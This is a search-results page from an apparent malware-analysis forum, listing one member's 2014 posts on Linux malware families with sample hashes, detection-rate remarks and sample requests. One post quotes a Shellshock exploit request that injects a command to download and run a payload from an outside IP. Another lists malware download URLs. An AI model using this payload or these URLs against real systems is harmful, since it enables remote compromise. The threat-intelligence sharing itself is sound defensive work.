A forum for reverse engineering, OS internals and malware analysis 

Search found 45 matches

Re: Linux/Mayhem

 by K_Mikhail ¦  Tue Nov 25, 2014 5:03 pm ¦  Forum: Malware ¦  Topic: Linux/Mayhem ¦  Replies: 26 ¦  Views: 61701

021af5de194024c0c76431ec6868534a250214e9

VT has known it since May 2014, but the detection ratio is still poor.

Re: Linux/LightTaidra (mod Zendran)

 by K_Mikhail ¦  Fri Nov 07, 2014 7:17 pm ¦  Forum: Malware ¦  Topic: Linux/LightTaidra (mod Zendran) ¦  Replies: 2 ¦  Views: 4109

+ Updates.

VT: 0/34 on all files.

Re: Linux/Mayhem

 by K_Mikhail ¦  Wed Nov 05, 2014 7:33 pm ¦  Forum: Malware ¦  Topic: Linux/Mayhem ¦  Replies: 26 ¦  Views: 61701

Re: Linux/Tsunami

 by K_Mikhail ¦  Tue Oct 14, 2014 11:32 am ¦  Forum: Malware ¦  Topic: Linux/Tsunami ¦  Replies: 28 ¦  Views: 57702

_http://128.199.179.103/private/auto/xtk-ppc-auto
_http://128.199.179.103/private/auto/xtk-mips-auto
_http://128.199.179.103/private/auto/xtk-mipsel-auto
_http://128.199.179.103/private/auto/xtk-x64-auto
_http://128.199.179.103/private/auto/xtk-arm-auto

x86 is absent.

Re: Linux/Xor.DDoS

 by K_Mikhail ¦  Thu Oct 09, 2014 12:05 am ¦  Forum: Malware ¦  Topic: Linux/Xor.DDoS ¦  Replies: 33 ¦  Views: 56699

Updated ELFs. /3502 - /3505

Re: Linux/Bash0day alias Shellshock

 by K_Mikhail ¦  Thu Sep 25, 2014 1:13 pm ¦  Forum: Malware ¦  Topic: Linux/Bash0day alias Shellshock alias Bashdoor ¦  Replies: 42 ¦  Views: 129653

apache.7z From https://gist.github.com/anonymous/929d622f3b36b00c0be1 : GET./.HTTP/1.0 .User-Agent:.Thanks-Rob .Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh; .Host:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/be...

Unclassified Linux backdoor

 by K_Mikhail ¦  Fri Sep 12, 2014 7:20 pm ¦  Forum: Malware ¦  Topic: Linux/Elknot (Windows DDoS botnet, alias DnsAmp) ¦  Replies: 52 ¦  Views: 70637

Re: Linux/Mayhem

 by K_Mikhail ¦  Thu Sep 04, 2014 4:56 pm ¦  Forum: Malware ¦  Topic: Linux/Mayhem ¦  Replies: 26 ¦  Views: 61701

Here is a more up-to-date list of Mayhem .so binaries (SHA1's): 039f55c3c44e0a10da38866cc4c920bce538410b_bruteforce.so 0759dd4602c0e7894ada36a5bbadad6c4ac9cd9c_bruteforce.so 0db15d93c71ddda6327122c49ffdb5f107e6d2b7_libworker.so 0f1c66c3bc54c45b1d492565970d51a3c83a582d_libworker.so 116b2ef01b6a0684f6da...

Re: Linux/Mayhem

 by K_Mikhail ¦  Thu Aug 28, 2014 11:10 pm ¦  Forum: Malware ¦  Topic: Linux/Mayhem ¦  Replies: 26 ¦  Views: 61701

Linux/Mayhem

 by K_Mikhail ¦  Fri Aug 01, 2014 6:09 pm ¦  Forum: Malware ¦  Topic: Linux/Mayhem ¦  Replies: 26 ¦  Views: 61701

Hello!

Looking for samples with SHA1's:

5ddebe39bdd26cf2aee202bd91d826979595784a
6992ed4a10da4f4b0eae066d07e45492f355f242
71c603c3dbf2b283ab2ee2ae1f95dcaf335b3fce
7b89f0615970d2a43b11fd7158ee36a5df93abc8

from the F-Secure article - http://www.f-secure.com/weblog/archives/00002727.html

Thank you!